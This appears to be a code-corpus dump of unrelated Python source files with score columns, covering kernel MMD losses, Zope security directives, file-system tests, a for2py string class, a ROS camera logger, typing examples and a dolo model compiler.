K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp()
K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp()
G_Ys = (H_s.mm(K_YsYs)).mm(H_s)
G_Yt = (H_t.mm(K_YtYt)).mm(H_t)
G_Zs = (H_s.mm(K_ZsZs)).mm(H_s)
G_Zt = (H_t.mm(K_ZtZt)).mm(H_t)
#====== R_{s} and R_{t} =======
Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse()
Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse()
R_s = epsilon*G_Zs.mm(Inv_s)
R_t = epsilon*G_Zt.mm(Inv_t)
#====== R_{st} =======
# B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon)
# B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon)
B_s = num_sam_s*epsilon*Inv_s
B_t = num_sam_t*epsilon*Inv_t
B_s = (B_s + B_s.t())/2 # numerical symmetrize
B_t = (B_t + B_t.t())/2 # numerical symmetrize
S_s, U_s = B_s.symeig(eigenvectors=True)
S_t, U_t = B_t.symeig(eigenvectors=True)
HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) )
HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) )
Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s)
U_n, S_n, V_n = torch.svd(Nuclear)
#====== Conditional KB Distance
CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5)
return CKB_dist
# MMD loss
def MMD_Metric(prob_s, prob_t):
num_sam_s = prob_s.shape[0]
num_sam_t = prob_t.shape[0]
D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(prob_s,prob_s.t())
D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_t.t())
D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_s.t())
sigma_XsXs = D_XsXs.mean().detach()
sigma_XtXt = D_XtXt.mean().detach()
sigma_XtXs = D_XtXs.mean().detach()
K_XsXs = (-D_XsXs/sigma_XsXs).exp()
K_XtXt = (-D_XtXt/sigma_XtXt).exp()
K_XtXs = (-D_XtXs/sigma_XtXs).exp()
MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean()
return MMD_dist
| 2.796875 | 3 |
Time_Series_DataAnalysis_Tool/__init__.py | chetanrrk/Time_Series_Data_Analysis_Tools | 1 | 12796195 | import Time_Series_DataAnalysis_Tool.time_series_analysis
import Time_Series_DataAnalysis_Tool.examples
import Time_Series_DataAnalysis_Tool.test
| 1 | 1 |
spladder/classes/counts.py | ratschlab/spladder | 96 | 12796196 | <filename>spladder/classes/counts.py
import numpy as np
class Counts:
def __init__(self, seg_num):
self.segments = np.zeros((seg_num,), dtype='float')
self.seg_pos = np.zeros((seg_num,), dtype='float')
self.edges = np.zeros((0, 2), dtype='float')
| 2.796875 | 3 |
ven2/lib/python2.7/site-packages/zope/security/metadirectives.py | manliu1225/Facebook_crawler | 3 | 12796197 | <reponame>manliu1225/Facebook_crawler
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Component architecture related 'zope' ZCML namespace directive interfaces
"""
__docformat__ = 'restructuredtext'
import zope.configuration.fields
from zope.configuration.fields import GlobalObject, GlobalInterface
from zope.configuration.fields import Tokens, PythonIdentifier
import zope.interface
import zope.schema
from zope.interface import Interface
import zope.security.zcml
from zope.security.i18n import ZopeMessageFactory as _
from zope.security.zcml import Permission
class IClassDirective(zope.interface.Interface):
"""Make statements about a class"""
class_ = zope.configuration.fields.GlobalObject(
title=_("Class"),
required=True
)
class IImplementsSubdirective(zope.interface.Interface):
"""Declare that the class given by the content directive's class
attribute implements a given interface
"""
interface = zope.configuration.fields.Tokens(
title=_("One or more interfaces"),
required=True,
value_type=zope.configuration.fields.GlobalInterface()
)
class IRequireSubdirective(zope.interface.Interface):
"""Indicate that the a specified list of names or the names in a
given Interface require a given permission for access.
"""
permission = zope.security.zcml.Permission(
title=_("Permission"),
description=_("""
Specifies the permission by id that will be required to
access or mutate the attributes and methods specified."""),
required=False,
)
attributes = zope.configuration.fields.Tokens(
title=_("Attributes and methods"),
description=_("This is a list of attributes and methods"
" that can be accessed."),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
set_attributes = zope.configuration.fields.Tokens(
title=_("Attributes that can be set"),
description=_("This is a list of attributes that can be"
" modified/mutated."),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
interface = zope.configuration.fields.Tokens(
title=_("Interfaces"),
description=_("The listed interfaces' methods and attributes"
" can be accessed."),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
set_schema = zope.configuration.fields.Tokens(
title=_("The attributes specified by the schema can be set"),
description=_("The listed schemas' properties can be"
" modified/mutated."),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
like_class = zope.configuration.fields.GlobalObject(
title=_("Configure like this class"),
description=_("""
This argument says that this content class should be configured in the
same way the specified class' security is. If this argument is
specified, no other argument can be used."""),
required=False,
)
class IAllowSubdirective(zope.interface.Interface):
"""
Declare a part of the class to be publicly viewable (that is,
requires the zope.Public permission). Only one of the following
two attributes may be used.
"""
attributes = zope.configuration.fields.Tokens(
title=_("Attributes"),
required=False,
value_type=zope.configuration.fields.PythonIdentifier(),
)
interface = zope.configuration.fields.Tokens(
title=_("Interface"),
required=False,
value_type=zope.configuration.fields.GlobalInterface(),
)
class IFactorySubdirective(zope.interface.Interface):
"""Specify the factory used to create this content object"""
id = zope.schema.Id(
title=_("ID"),
description=_("""
the identifier for this factory in the ZMI factory
identification scheme. If not given, defaults to the literal
string given as the content directive's 'class' attribute."""),
required=False,
)
title = zope.configuration.fields.MessageID(
title=_("Title"),
description=_("Text suitable for use in the 'add content' menu"
" of a management interface"),
required=False,
)
description = zope.configuration.fields.MessageID(
title=_("Description"),
description=_("Longer narrative description of what this"
" factory does"),
required=False,
)
class IModule(Interface):
"""Group security declarations about a module"""
module = GlobalObject(
title=u"Module",
description=u"Pointer to the module object.",
required=True)
class IAllow(Interface):
"""Allow access to selected module attributes
Access is unconditionally allowed to any names provided directly
in the attributes attribute or to any names defined by
interfaces listed in the interface attribute.
"""
attributes = Tokens(
title=u"Attributes",
description=u"The attributes to provide access to.",
value_type=PythonIdentifier(),
required=False)
interface = Tokens(
title=u"Interface",
description=(u"Interfaces whos names to provide access to. Access "
u"will be provided to all of the names defined by the "
u"interface(s). Multiple interfaces can be supplied."),
value_type=GlobalInterface(),
required=False)
class IRequire(Interface):
"""Require a permission to access selected module attributes
The given permission is required to access any names provided
directly in the attributes attribute or any names defined by
interfaces listed in the interface attribute.
"""
attributes = Tokens(
title=u"Attributes",
description=u"The attributes to require permission for.",
value_type=PythonIdentifier(),
required=False)
permission = Permission(
title=u"Permission ID",
description=u"The ID of the permission to require.")
| 1.703125 | 2 |
src/compas_singular/rhino/rhino/__init__.py | christiandimitri/compas_singular | 1 | 12796198 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .density import *
from .display import *
from .getters import *
from .pattern import *
from .patternartist import *
__all__ = [name for name in dir() if not name.startswith('_')]
| 1.507813 | 2 |
uc2data/helpers.py | TUBklima/UC2Data | 6 | 12796199 | from .Dataset import Dataset
from pathlib import Path
def check_multi(folder):
pathlist = Path(folder).glob('**/*.nc')
for path in pathlist:
outfile = Path(str(path).replace(".nc", ".check"))
try:
with Dataset(path) as i_data:
i_data.uc2_check()
i_data.check_result.to_file(outfile, full=False)
except Exception:
text_file = open(str(outfile), "w")
text_file.write("Could not read file: "+str(path))
text_file.close()
| 2.578125 | 3 |
dolo/compiler/model_numeric.py | zlqs1985/dolo | 0 | 12796200 | import ast
from collections import OrderedDict
from .codegen import to_source
from .function_compiler_ast import timeshift, StandardizeDatesSimple
from dolo.compiler.recipes import recipes
from numba import njit
class NumericModel:
calibration = None
calibration_dict = None
covariances = None
markov_chain = None
def __init__(self, symbolic_model, options=None, infos=None):
self.symbolic = symbolic_model
self.symbols = symbolic_model.symbols
self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ())
self.options = options if options is not None else {}
self.infos = infos if infos is not None else {}
self.infos['data_layout'] = 'columns'
self.name = self.infos['name']
self.model_type = self.infos['type']
# self.model_spec
self.__update_from_symbolic__()
self.__compile_functions__()
def __update_from_symbolic__(self):
import numpy
# updates calibration according to the symbolic definitions
system = self.symbolic.calibration_dict
from dolo.compiler.triangular_solver import solve_triangular_system
self.calibration_dict = solve_triangular_system( system )
from dolo.compiler.misc import CalibrationDict, calibration_to_vector
calib = calibration_to_vector(self.symbols, self.calibration_dict)
self.calibration = CalibrationDict(self.symbols, calib)
from .symbolic_eval import NumericEval
evaluator = NumericEval(self.calibration_dict)
# read symbolic structure
self.options = evaluator.eval(self.symbolic.options)
distribution = evaluator.eval(self.symbolic.distribution)
discrete_transition = evaluator.eval(self.symbolic.discrete_transition)
covariances = distribution
if distribution is None:
self.covariances = None
else:
self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float))
markov_chain = discrete_transition
if markov_chain is None:
self.markov_chain = None
else:
self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain]
def get_calibration(self, pname, *args):
if isinstance(pname, list):
return [ self.get_calibration(p) for p in pname ]
elif isinstance(pname, tuple):
return tuple( [ self.get_calibration(p) for p in pname ] )
elif len(args)>0:
pnames = (pname,) + args
return self.get_calibration(pnames)
group = [g for g in self.symbols.keys() if pname in self.symbols[g]]
try:
group = group[0]
except:
raise Exception('Unknown symbol {}.'.format(pname))
i = self.symbols[group].index(pname)
v = self.calibration[group][i]
return v
def set_calibration(self, *args, **kwargs):
# raise exception if unknown symbol ?
if len(args)==2:
pname, pvalue = args
if isinstance(pname, str):
self.set_calibration(**{pname:pvalue})
else:
# else ignore pname and pvalue
calib = self.symbolic.calibration_dict
calib.update(kwargs)
self.__update_from_symbolic__()
def __str__(self):
from dolo.misc.termcolor import colored
s = u'''
Model object:
------------
- name: "{name}"
- type: "{type}"
- file: "{filename}\n'''.format(**self.infos)
ss = '\n- residuals:\n\n'
res = self.residuals()
# for eqgroup, eqlist in self.symbolic.equations.items():
for eqgroup in res.keys():
eqlist = self.symbolic.equations[eqgroup]
ss += u" {}\n".format(eqgroup)
for i, eq in enumerate(eqlist):
val = res[eqgroup][i]
if abs(val) < 1e-8:
val = 0
vals = '{:.4f}'.format(val)
if abs(val) > 1e-8:
vals = colored(vals, 'red')
# eq = eq.replace('|', u"\u27C2")
ss += u" {eqn:3} : {vals} : {eqs}\n".format(eqn=str(i+1), vals=vals, eqs=eq)
ss += "\n"
s += ss
# import pprint
# s += '- residuals:\n'
# s += pprint.pformat(compute_residuals(self),indent=2, depth=1)
return s
def __repr__(self):
return self.__str__()
@property
def x_bounds(self):
if 'controls_ub' in self.functions:
fun_lb = self.functions['controls_lb']
fun_ub = self.functions['controls_ub']
return [fun_lb, fun_ub]
else:
return None
def residuals(self, calib=None):
if self.model_type == 'dtcscc':
from dolo.algos.dtcscc.steady_state import residuals
return residuals(self, calib)
elif self.model_type == 'dtmscc':
from dolo.algos.dtmscc.steady_state import residuals
return residuals(self, calib)
def eval_formula(self, expr, dataframe=None, calib=None):
from dolo.compiler.eval_formula import eval_formula
if calib is None:
calib = self.calibration
return eval_formula(expr, dataframe=dataframe, context=calib)
def __compile_functions__(self):
from dolo.compiler.function_compiler_ast import compile_function_ast
from dolo.compiler.function_compiler import standard_function
defs = self.symbolic.definitions
# works for fg models only
model_type = self.model_type
if 'auxiliaries' not in self.symbols:
model_type += '_'
else:
# prepare auxiliaries
auxeqs = self.symbolic.equations['auxiliary']
auxdefs = {}
for time in [-1,0,1]:
dd = OrderedDict()
for eq in auxeqs:
lhs, rhs = eq.split('=')
lhs = ast.parse( str.strip(lhs) ).body[0].value
rhs = ast.parse( str.strip(rhs) ).body[0].value
tmp = timeshift(rhs, self.variables, time)
k = timeshift(lhs, self.variables, time)
k = StandardizeDatesSimple(self.variables).visit(k)
v = StandardizeDatesSimple(self.variables).visit(tmp)
dd[to_source(k)] = to_source(v)
auxdefs[time] = dd
recipe = recipes[model_type]
symbols = self.symbols # should match self.symbols
comps = []
functions = {}
original_functions = {}
original_gufunctions = {}
for funname in recipe['specs'].keys():
spec = recipe['specs'][funname]
if funname not in self.symbolic.equations:
if not spec.get('optional'):
raise Exception("The model doesn't contain equations of type '{}'.".format(funname))
else:
continue
if spec.get('target'):
# keep only right-hand side
# TODO: restore recursive definitions
eqs = self.symbolic.equations[funname]
eqs = [eq.split('=')[1] for eq in eqs]
eqs = [str.strip(eq) for eq in eqs]
target_spec = spec.get('target')
n_output = len(self.symbols[target_spec[0]])
# target_short_name = spec.get('target')[2]
if spec.get('recursive') is False:
target_spec = None
else:
target_spec[2] = 'out'
else:
target_spec = None
if spec.get('complementarities'):
# TODO: Rewrite and simplify
comp_spec = spec.get('complementarities')
comp_order = comp_spec['middle']
comp_args = comp_spec['left-right']
comps = []
eqs = []
for i,eq in enumerate(self.symbolic.equations[funname]):
if '|' in eq:
control = self.symbols[comp_order[0]][i]
eq, comp = str.split(eq,'|')
lhs, rhs = decode_complementarity(comp, control)
comps.append([lhs, rhs])
else:
comps.append(['-inf', 'inf'])
eqs.append(eq)
comp_lhs, comp_rhs = zip(*comps)
# fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)]
fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)]
ddefs = OrderedDict()
for ag in comp_args:
if ag[0] == 'auxiliaries':
t = ag[1]
ddefs.update(auxdefs[t])
ddefs.update(defs)
lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs)
upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs)
n_output = len(comp_lhs)
functions[fb_names[0]] = standard_function(gu_lower_bound, n_output )
functions[fb_names[1]] = standard_function(gu_upper_bound, n_output )
original_functions[fb_names[0]] = lower_bound
original_functions[fb_names[1]] = upper_bound
original_gufunctions[fb_names[0]] = gu_lower_bound
original_gufunctions[fb_names[1]] = gu_upper_bound
# rewrite all equations as rhs - lhs
def filter_equal(eq):
if '=' in eq:
lhs, rhs = str.split(eq,'=')
eq = '{} - ( {} )'.format(rhs, lhs)
eq = str.strip(eq)
return eq
else:
return eq
eqs = [filter_equal(eq) for eq in eqs]
arg_names = recipe['specs'][funname]['eqs']
ddefs = OrderedDict()
for ag in arg_names:
if ag[0] == 'auxiliaries':
t = ag[1]
ddefs.update(auxdefs[t])
ddefs.update(defs)
fun, gufun = compile_function_ast(eqs, symbols, arg_names,
output_names=target_spec, funname=funname, definitions=ddefs,
)
# print("So far so good !")c
n_output = len(eqs)
original_functions[funname] = fun
functions[funname] = standard_function(gufun, n_output )
original_functions[funname] = fun
original_gufunctions[funname] = gufun
self.__original_functions__ = original_functions
self.__original_gufunctions__ = original_gufunctions
self.functions = functions
import re
regex = re.compile("(.*)<=(.*)<=(.*)")
def decode_complementarity(comp, control):
'''
# comp can be either:
- None
- "a<=expr" where a is a controls
- "expr<=a" where a is a control
- "expr1<=a<=expr2"
'''
try:
res = regex.match(comp).groups()
except:
raise Exception("Unable to parse complementarity condition '{}'".format(comp))
res = [r.strip() for r in res]
if res[1] != control:
msg = "Complementarity condition '{}' incorrect. Expected {} instead of {}.".format(comp, control, res[1])
raise Exception(msg)
return [res[0], res[2]]
| 2.125 | 2 |
tests/bmc_test.py | reich6534/SumoPY | 0 | 12796201 | <reponame>reich6534/SumoPY<filename>tests/bmc_test.py
from nose.tools import *
from bmc.book import Book
def setup():
print ("SETUP!")
def teardown():
print("TEAR DOWN!")
def test_bookname():
matthew = Book("Matthew", 27)
assert_equal(matthew.name, "Matthew")
@raises (IndexError)
def test_small():
B = Book("Genesis", 50)
B.set_chapter_descr(0, "This should fail")
@raises(IndexError)
def test_big():
B = Book("Revelation", 22)
B.set_chapter_descr(23, "This should fail")
@raises(ValueError)
def test_bigbook():
Book("Exodus", 151)
@raises(ValueError)
def test_smallbook():
Book("Obadiah", 0)
| 2.328125 | 2 |
tests/vfs/gzip_file_system.py | Defense-Cyber-Crime-Center/dfvfs | 2 | 12796202 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the file system implementation using gzip."""
import os
import unittest
from dfvfs.path import gzip_path_spec
from dfvfs.path import os_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import gzip_file_system
class GzipFileSystemTest(unittest.TestCase):
"""The unit test for the gzip file system object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._resolver_context = context.Context()
test_file = os.path.join(u'test_data', u'syslog.gz')
path_spec = os_path_spec.OSPathSpec(location=test_file)
self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec)
def testOpenAndClose(self):
"""Test the open and close functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_system.Close()
def testFileEntryExistsByPathSpec(self):
"""Test the file entry exists by path specification functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec))
file_system.Close()
def testGetFileEntryByPathSpec(self):
"""Test the get entry by path specification functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec)
self.assertNotEqual(file_entry, None)
self.assertEqual(file_entry.name, u'')
file_system.Close()
def testGetRootFileEntry(self):
"""Test the get root file entry functionality."""
file_system = gzip_file_system.GzipFileSystem(self._resolver_context)
self.assertNotEqual(file_system, None)
file_system.Open(path_spec=self._gzip_path_spec)
file_entry = file_system.GetRootFileEntry()
self.assertNotEqual(file_entry, None)
self.assertEqual(file_entry.name, u'')
file_system.Close()
if __name__ == '__main__':
unittest.main()
| 2.609375 | 3 |
Informatik1/Midterms Prep/midterms hs19/count_keywords.py | Queentaker/uzh | 8 | 12796203 | <reponame>Queentaker/uzh<filename>Informatik1/Midterms Prep/midterms hs19/count_keywords.py
def count_keywords(path, keywords):
words = []
sol = dict()
with open(path) as file:
for line in file:
for word in line.split():
words.append(word.lower())
for element in words:
if element in keywords:
if element in sol:
sol[element] += 1
else: sol[element] = 1
else:
continue
return sol
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", ["forest", "the", "found"]))
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", ["black"]))
print(count_keywords("/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt", [])) | 3.46875 | 3 |
delphi/translators/for2py/strings.py | mikiec84/delphi | 25 | 12796204 | <filename>delphi/translators/for2py/strings.py
"""
File: strings.py
Purpose: Code implementing string objects (corresponding to the Fortran
CHARACTER type) in the code generated by for2py.
Usage: see the document "for2py: Miscellaneous constructs"
"""
class String:
def __init__(self, length = 0, value = ""):
if length > 0:
self._length = length
else:
self._length = len(value)
# Before value is assigned to self._val, it may need to be adjusted
# if len(value) != length
self.set_(value)
def value(self, obj):
if isinstance(obj, String):
return obj._val
else:
return obj
def padding(self, n):
"""padding() returns a string of blanks of length = sef._length - n."""
if n < self._length: # pad with blanks
k = self._length - n
pad_str = " " * k
else:
pad_str = ""
return pad_str
def set_(self, strval):
s = self.value(strval)
n = len(s)
if n < self._length:
adjusted = s + self.padding(n)
else:
adjusted = s[:self._length] # truncate to self._length
self._val = adjusted
def __len__(self):
return self._length
def __add__(self, other):
"""String concatenation"""
return self._val + self.value(other)
def __radd__(self, other):
"""String concatenation"""
return self.value(other) + self._val
def adjustl(self):
"""adjustl() implements the ADJUSTL() function of Fortran. This
function removes leading blanks and adds blanks on the right
so that the result is the same length as the input string."""
s = self._val.lstrip()
pad_str = self.padding(len(s))
return s + pad_str
def adjustr(self):
"""adjustr() implements the ADJUSTR() function of Fortran. This
function removes trailing blanks and adds blanks on the left
so that the result is the same length as the input string."""
s = self._val.rstrip()
pad_str = self.padding(len(s))
return pad_str + s
def f_index(self, substring, direction=[]):
"""f_index() implements the string search function of Fortran's INDEX()
function; we use the name f_index to emphasize that the behavior of
Fortran's INDEX() is slightly different from that of Python's index().
f_index() returns the position within a string where substring
first occurs; 0 if there is no such occurrence. If the argument
direction contains "back" the string is searched backwards starting
from the end."""
substr = self.value(substring)
if "back" in direction:
pos = self._val.rfind(substr)
else:
pos = self._val.find(substr)
return pos + 1
def len_trim(self):
return len(self._val.rstrip())
def repeat(self, n):
return self._val * n
def trim(self):
return self._val.rstrip()
def get_substr(self, i, j):
"""get_substr(i, j) returns the substring of the given string beginning
at position i (start position = 1) and ending at position j."""
return self._val[(i-1):j]
def set_substr(self, i, j, other):
# extract the substring
substr = self.value(other)[:(j-i+1)]
# construct the new string value
newstr = self._val[:(i-1)] + substr + self._val[j:]
# update
self.set_(newstr)
def __str__(self):
return self._val
| 3.140625 | 3 |
functional-problems/deleteNodeFromBst.py | vikas-t/DS-Algo | 0 | 12796205 | <filename>functional-problems/deleteNodeFromBst.py
#!/usr/bin/python3
# https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1
def minValueNode(root):
"""
Returns the iorder successor or the next higher node as per
the inorder traversal
"""
current = root
# loop down to find the leftmost leaf
while(current.left is not None):
current = current.left
return current
def deleteNode(root, key):
if root == None:
return
if key < root.data:
root.left = deleteNode(root.left, key)
# If the key to be deleted is smaller than the root's
# key then it lies in left subtree
elif key > root.data:
root.right = deleteNode(root.right, key)
# If the key to be deleted is greater than the root's
# key then it lies in right part
else:
# The key is same as root's key, then this is the node to be deleted
if root.left == None:
tmp = root.right
root = None
return tmp
elif root.right == None:
tmp = root.left
root = None
return tmp
# Convers cases when there is only one child of the root or no child
v = minVal(root.right)
# When both nodes exists, get the inorder successor
root.data = v.data
root.right = deleteNode(root.right, v.data)
# Delete the inorder successor
return root
| 3.984375 | 4 |
codeforces/acmsguru/112.py | Ashindustry007/competitive-programming | 506 | 12796206 | #!/usr/bin/env python3
# https://codeforces.com/problemsets/acmsguru/problem/99999/112
a,b=map(int,input().split())
print(pow(a,b)-pow(b,a))
| 3.265625 | 3 |
catkin_ws/src/tugasakhir/ta_vision/scripts/uji_transdata.py | musyafaarif/workspace | 0 | 12796207 | #!/usr/bin/env python3
import ta_vision
from vision.camera import Camera
from color_detection import ColorDetection
import cv2 as cv
import rospy
import time
import math
from geometry_msgs.msg import PointStamped
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import csv
lower_threshold = (160, 190, 220)
upper_threshold = (180, 230, 255)
FW = 320
FH = 240
FOVX = 62.2
FOVY = 48.8
KX = FOVX / FW / 180.0 * math.pi
KY = FOVY / FH / 180.0 * math.pi
# CSV
cam_csv = open('/home/musyafa/Datalog/cam.csv', 'w')
real_csv = open('/home/musyafa/Datalog/real.csv', 'w')
cam_writer = csv.writer(cam_csv)
real_writer = csv.writer(real_csv)
cam_writer.writerow(['Time', 'Cam Position X', 'Cam Position Y', 'Time', 'Real Position X', 'Real Position Y'])
real_writer.writerow(['Time', 'Real Position X', 'Real Position Y'])
waktu = rospy.Time(0)
pose = Pose()
z = 0
roll = 0
pitch = 0
yaw = 0
def models_cb(msg):
global pose, z, roll, pitch, yaw, waktu
pose = msg.pose[1]
z = msg.pose[1].position.z
orientation_list = [msg.pose[1].orientation.x, msg.pose[1].orientation.y, msg.pose[1].orientation.z, msg.pose[1].orientation.w]
(roll, pitch, yaw) = euler_from_quaternion(orientation_list)
waktu = rospy.Time.now()
def trans_data(x, y):
global z, roll, pitch, yaw
x_ = math.tan(KX * x - roll) * z
y_ = math.tan(KY * y - pitch) * z
# x_ = math.tan(KX * x + roll) * z
# y_ = math.tan(KY * y + pitch - 1.57079632679) * z
out_x = -math.sin(yaw) * x_ - math.cos(yaw) * y_
out_y = math.cos(yaw) * x_ - math.sin(yaw) * y_
return (out_x, out_y)
if __name__ == "__main__":
try:
rospy.init_node("color_detection")
rate = rospy.Rate(15) # 15 FPS
cam_pos_pub = rospy.Publisher('/datalog/cam', Point, queue_size=5)
real_pos_pub = rospy.Publisher('/datalog/real', Point, queue_size=5)
cam_pub = rospy.Publisher("camera/data", PointStamped, queue_size=10)
rospy.Subscriber('/gazebo/model_states', ModelStates, models_cb)
set_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
rospy.wait_for_message('/gazebo/model_states', ModelState)
model = ModelState()
model.model_name='pi_cam'
model.pose = pose
model.pose.position.x = -0.5
model.pose.position.y = -0.5
set_state(model_state=model)
cap = Camera(port=5600)
cd = ColorDetection(lower_threshold, upper_threshold)
rospy.loginfo("Wait for camera capture..")
frame = cap.capture()
while frame is None and not rospy.is_shutdown():
rate.sleep()
frame = cap.capture()
rospy.loginfo("Frame captured!")
fps = 30.0
t = time.time()
while not rospy.is_shutdown():
frame = cap.capture()
t_cap = rospy.Time.now()
mask = cd.update(frame)
if cd.centroid:
(cX, cY) = cd.centroid
centroid = PointStamped()
centroid.point.x = cX - 160
centroid.point.y = cY - 120
centroid.point.y = -centroid.point.y
centroid.header.stamp = t_cap
cam_pub.publish(centroid)
(X, Y) = trans_data(centroid.point.x, centroid.point.y)
rospy.loginfo("ERRX: %f; ERRY: %f", X - pose.position.x, Y - pose.position.y)
cam_pos = Point(x=X, y=Y, z=1)
cam_pos_pub.publish(cam_pos)
cam_writer.writerow([t_cap, cam_pos.x, cam_pos.y, waktu, pose.position.x, pose.position.y])
real_writer.writerow([waktu, pose.position.x, pose.position.y])
pose.position.x = pose.position.x + 0.001
pose.position.y = pose.position.y + 0.001
model.pose = pose
set_state(model_state=model)
real_pos_pub.publish(pose.position)
if pose.position.x >= 0.5:
break
if cd.has_centroid:
cv.circle(frame, cd.centroid, 5, 127, -1)
cv.putText(frame, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
# if cd.has_centroid:
# cv.circle(mask, cd.centroid, 5, 127, -1)
# cv.putText(mask, "fps: %.1f" % fps, (240, 230), cv.FONT_HERSHEY_SIMPLEX, 0.5, 127, 2)
cv.imshow("Frame", frame)
# cv.imshow("Frame", mask)
key = cv.waitKey(15)
if key == 27:
break
fps = 0.9 * fps + 0.1 * 1 / (time.time() - t)
t = time.time()
rate.sleep()
except rospy.ROSInterruptException:
pass
if cap is not None:
cap.close()
cv.destroyAllWindows()
cam_csv.close()
real_csv.close()
| 2.171875 | 2 |
Standard Library/typing/typing/special_form.py | subhadeep-123/Python-Documents | 2 | 12796208 | <filename>Standard Library/typing/typing/special_form.py
from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union
# This a tuple defined with variable lenght
def print_tuple(data: Tuple[Any, ...]) -> None:
print(data)
def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]:
try:
if a == b:
return True
elif a < b:
return -1
elif a > b:
return +1
else:
return False
except Exception as err:
return f"Error - {err}"
def test_optional(name: Optional[str] = None) -> Optional[str]:
if name is None:
return None
return f"Hello {name}"
def test_callable(func: Callable, name: str) -> None:
print(func(name))
test_callable(test_optional, name="Matrix")
def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']):
if mode == 'r':
with open(file, mode) as fp:
print(fp.read())
elif mode == 'w':
with open(file, mode) as fp:
fp.write("Hey, this is a text")
# class WithoutClassVars:
# vardict = {}
# print(vardict)
# obj = WithoutClassVars()
# obj.vardict = {"name": "matrix"}
# WithoutClassVars.vardict = {"val": 10}
class WithClassVars:
vardict: ClassVar[dict[str, int]] = {}
print(vardict)
obj = WithClassVars()
# obj.vardict = {"name": "matrix"}
WithClassVars.vardict = {"val": 10}
# Testing typing.Final
# MAX_SIZE: Final = 9000
# MAX_SIZE += 1
# print(MAX_SIZE)
# class Connection:
# TIMEOUT: Final[List[int]] = [1,2,3,4,5,6]
# class FastConnector(Connection):
# TIMEOUT = [50,30,40]
def concat(a: AnyStr, b: AnyStr) -> AnyStr:
return a + b
concat(f"foo ", u"bar ")
concat(b"foo ", b"bar ")
concat(u"foo ", b"bar ")
| 3.109375 | 3 |
src/init.py | arnulfojr/simple-pos | 1 | 12796209 | <filename>src/init.py
from werkzeug.wsgi import DispatcherMiddleware
